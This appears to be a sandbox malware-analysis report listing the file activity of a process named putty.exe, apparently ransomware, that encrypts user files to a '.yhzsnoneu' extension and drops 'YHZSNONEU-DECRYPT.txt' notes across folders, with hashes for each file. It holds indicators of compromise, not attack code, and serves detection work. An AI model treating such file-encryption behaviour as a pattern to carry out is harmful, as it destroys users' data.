C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.yhzsnoneu
binary
MD5: 9df324b5f356d5cb363d39058f89d752
SHA256: 4aa9ca93cebc70d42181a08bfb0f22c398216d7ebf3e731f4ebe788caf600cd3
3020
putty.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.yhzsnoneu
binary
MD5: 170cfb8b1abab88cbb44fdb9547530bd
SHA256: fa4133e3a6b4ed104b5c2c2101dd5136594738d07acaea710690d70f375cf420
3020
putty.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.yhzsnoneu
binary
MD5: 12618d59d9bd7bfe4393ac7fcfc33987
SHA256: 6f076193ac9d515c4de5e7b03dba63f85c8de444b693452783b67908251e4a23
3020
putty.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\ntuser.dat.LOG1.yhzsnoneu
binary
MD5: dae9fbb49c1431cafca3fc86e6300345
SHA256: de7e91a3f66659c2087099284d2e5ee51d129085930cefce1f925e5f6149ac2d
3020
putty.exe
C:\Users\Administrator\ntuser.dat.LOG1
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Network Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Links\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url.yhzsnoneu
binary
MD5: bdb244d19d2b2a213b82c92e7a0fe134
SHA256: bd6735c8f8e49d654e4ee6dcab34fa656ae0fe6880ab56cab31ef0c7613eb721
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url.yhzsnoneu
binary
MD5: 354a84b3b43a2a395dc31ba45f309955
SHA256: 93790208174f53095b7a562e13afffb14735e3b4649768fbbb939931d4be8e9a
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url.yhzsnoneu
binary
MD5: 70d4ba03efc1cdb0d9a541a7fafa2ff0
SHA256: 38361f9ab47b26919add54ad2394d9d01f6e58db3f282241b6b2b95259d4e2e3
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url.yhzsnoneu
binary
MD5: fc1ee2c261bf99a8de2623f2c988d4fa
SHA256: ad380f67213918bf22f65a48ebb893ec3052977c1ee7fbfa71516997b53b2f3f
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Windows Live\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url.yhzsnoneu
binary
MD5: 8108639c5ed3ae155470d572a54763a9
SHA256: 8d6a22c04bacb1279d2e5a603f8580446bf7f4d1fec807b796b76de942e7cdab
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url.yhzsnoneu
binary
MD5: 4241fd81427af24b71ae04d04254dc7c
SHA256: 77340998bc39b26feff52a9bb6131a368166224010b0ca5cb724a414e5b4ad75
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url.yhzsnoneu
binary
MD5: 019d77f322cebc8fc99d4291d5d4a09a
SHA256: d6381bb190ed3aecd751ae6cc2bd748a8d18ba9952c6eb4835f75fcbeef1ee9e
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url.yhzsnoneu
binary
MD5: 4708bb88bce22bc87450ad9921b10116
SHA256: b1ae741cd035230ef443ff6d9de4fc117d53ebda13eab2daa9e0c4e24f368bee
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url.yhzsnoneu
binary
MD5: 89929088248d0a3b6a1e3b65aa7d9450
SHA256: 449f83f27f0c9ca5fd81d6afc45cce26be401ea126d1310f8229f00fa83b61bd
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url.yhzsnoneu
binary
MD5: a5a33d469ab71df27ae8d73fa7cf4235
SHA256: bec8f286ebf9e0d8d0bdf5c0b1d9f06e335180213a136e5da6a73fbf9f64310d
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\MSN Websites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url.yhzsnoneu
binary
MD5: 61cc975607e088c64045f1c83f57061a
SHA256: 8f8f3be2e332d0e56c40e963724ea0880984636b31c5bb8fb19e8bf85861e89c
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url.yhzsnoneu
binary
MD5: 0e913382f1275b88a2c027172accc3ad
SHA256: 4dc1b815e4beb89748af09b63511a08320772ea154e9fb9d6a02c30c72d9be17
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url.yhzsnoneu
binary
MD5: 9ccdb72b4dffed5426f37bd216a97124
SHA256: fc8346a4ec1bd5069776d1c6d80caa6ad0db76c15454f2bea1ee6f64e37cc13d
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url.yhzsnoneu
binary
MD5: 11a0a3d26da8a5ea63e025a2077d90f1
SHA256: 43143b9417154316dc7d541e5d7df3741f0a45c6ad72c4e91f60b59ec0ef5545
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url.yhzsnoneu
binary
MD5: 3cb812972be4fbc430f53ec3812d1286
SHA256: d414603c1633258a97e2c53cbb63d978dcaa5a61318247724e4182f288e40821
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Microsoft Websites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url.yhzsnoneu
binary
MD5: 37575eef964966deb1c50409f5f5c994
SHA256: 3401f4a489a69b8d967a70089148f4ed4e428aa59fb8421cb4683a383ab1f5a0
3020
putty.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url.yhzsnoneu
binary
MD5: 367eb855cf55b11db0dd3b80f0c63519
SHA256: 064dd926ca4f1421c7c279710db5b33f0d68ec9e3b87f5668de15996c68f101c
3020
putty.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url.yhzsnoneu
binary
MD5: bd6c2a3bda15abb6f1ddc6ba737aea7d
SHA256: 3ab544e2cfb0600baaf8c41d81d7202d87f2a5f78e0c1ee54507ac08c45b22c3
3020
putty.exe
C:\Users\Administrator\Favorites\Links for United States\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Videos\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Documents\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Pictures\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Contacts\Administrator.contact.yhzsnoneu
binary
MD5: 909fa512271601a6cc7b2a8434fe801e
SHA256: 1ccac1c5935185dd50fed908bf9e3a779490fef886eb38ed830330e4eef93eb5
3020
putty.exe
C:\Users\Administrator\Desktop\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Downloads\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Music\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Favorites\Links\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Contacts\Administrator.contact
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\Contacts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred.yhzsnoneu
binary
MD5: a0ac6fa89ed41b19d6cfe9dd88ff1c5b
SHA256: 1a84933c93bf9996d9fc28e0afcd7c51b4beb3ddb51b86e3fdfc55568dbb5bfc
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156.yhzsnoneu
binary
MD5: f9d9d23d630467f86fee24467149efc9
SHA256: be16f2954742996ebc30e9f33a1c77b4291c49bd9c8cedaa0a20bb9ce3eec08d
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST.yhzsnoneu
binary
MD5: 50b36ae181dea19ed2011487a2a09d51
SHA256: 264536fdd6edc41e01f60103dea60d78d176e09fd56ae10083142707f2642c63
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\WPDNSE\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Identities\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Media Center Programs\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\LocalLow\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Identities\{BA2162A3-2F32-4850-8D8C-B3C9A2AA9D43}\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log.yhzsnoneu
binary
MD5: 98f6d008e8e27fe24c209e951ed600e0
SHA256: a7ff9489fe0bf3f16a423be95ce2332ed23c10ca837da726b06a1c28dc164c19
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\Low\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp.yhzsnoneu
binary
MD5: bb0ef6979239b02cd9e7211104b226c7
SHA256: 1c7f5597ade910266776fce36c5c2712b2c21403f1eb593b3d1546892891abe6
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Temp\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.yhzsnoneu
binary
MD5: 45b2f694b83aba1b412d9b18a2617b17
SHA256: b351c2302a73356b8b5198035e529841145c2d96245daa9e14fcf5ad0e67122a
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Gadgets\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.yhzsnoneu
binary
MD5: 55260d1b94bc4dcdd74be26d0c8cb931
SHA256: 86ea23f6ec1a7f509d20e433f409c8b424e88adbb807cedd7012ee1cabfdeccf
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.yhzsnoneu
binary
MD5: 9f69ed7250f4021e896efb2442e689d7
SHA256: 07e532ac64fe50451932121062594c770907d0d2dd1d47342c110694934854bc
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.yhzsnoneu
binary
MD5: b6ca0aa1e465a8cf741a7ce36a4d0c9c
SHA256: ca6ff10bd82edac894deaf7307f6e05556b8a6fca5a2979e1d9b561c9ae98d51
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.yhzsnoneu
binary
MD5: dc285b75c40a78d0a45bb7721747f86a
SHA256: e2dbf85087f7eaff681893df05cddcc7facd5b4f593efb0994195a86c28b30f8
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.yhzsnoneu
binary
MD5: d733e1869717d27eb4cb7dbc0a2937f6
SHA256: 1d15b7cdffd6d6fb46183dc6c0334d6e4eeae833589e76b49f0c610df55eade3
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.yhzsnoneu
binary
MD5: 638db321ecdec0c17b9625c3d68f83ce
SHA256: 0e5fb5de22cb5e45e38d3028ec7e9ee3e6e12432ce8f87f5f9edcdd20681cac3
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf.yhzsnoneu
binary
MD5: 03504ab69a8b50edc62a32e5c5c93619
SHA256: 3c656e5b2c20c595b77593fdc16890d1cf25e3bfc55c0249d46012df1136a2f2
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.yhzsnoneu
binary
MD5: 06bb640b4c6e75384a58fee076679553
SHA256: 6715ad1609ee2ced5317bb6a6f0427c1059886cef9a243288fd3525d8a8cb33b
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.yhzsnoneu
binary
MD5: a21b81d5585ac7e2662be5ed4dc5d940
SHA256: 4ec8059e71ad9de3cba17cc2061659c00d5364459bd594a6ffb1e56a83cfe71d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.yhzsnoneu
binary
MD5: c267fea80abf62d57eb3409d42c9d2b3
SHA256: abd1cefeda79d1782996005044cc7e3666922aa4453ddc83ca664a68f5bb5e24
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.yhzsnoneu
binary
MD5: 2a4395b14ba6fbda7f1f2405213c13ec
SHA256: 28f0560d889560fd02e68f0f9df5a19f9f6b51cb251fe58286d89c36f7746cd0
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.yhzsnoneu
binary
MD5: f155d81e9dd4c0820fb624ed262aa9d9
SHA256: 3aa36696e36740fba2e276502c16e65cce33d741df05f7160c16484664b60b6e
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.yhzsnoneu
binary
MD5: 25a570ebd8f5f50d0918c5afbb64eb40
SHA256: 13196e2028dbfafd5625d347bcea630abdb62e2450ae354846936763fa1508e0
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.yhzsnoneu
binary
MD5: dc34c0070511a6a3ba0302f42de02510
SHA256: ec4a5d19a9fbd5a0ee970b4fc9b2090d085a30698d4bed3f49eba394a10d6173
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.yhzsnoneu
binary
MD5: 5e5807bda0fcb964ed62e6e0089a7ce7
SHA256: f3bc4d587aeae827e313691f800b745e6a38b40e304f34a49e8f0231e6ff0237
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf.yhzsnoneu
binary
MD5: d01dcf1a2447ef190a7ca02996cae1cf
SHA256: 2e59dbf86cefdebd9f3efc0b3ded89db884070f3c71b2768c882b9bace6f9ed2
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.yhzsnoneu
binary
MD5: aabcb48791eeb315e32e867f6a39fe00
SHA256: 6c9cd49de690c8339ed6ea7d2bbf414d92c8a4c1ce6d41ec435722e08e246680
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.yhzsnoneu
binary
MD5: bb7ca725ae6325d8d46be0334cfd6613
SHA256: f35a908b739df51b7371c6e090aa3d98573e50b2ff25ed0d8f5a49553f7c689f
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf.yhzsnoneu
binary
MD5: 40f2f023b3f5ea61b3b076427899ab92
SHA256: e8bf2ae699e9df1ed97c10b5c6d4efb0b71d59cb83af58b9a8125db0e6473ae5
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.yhzsnoneu
binary
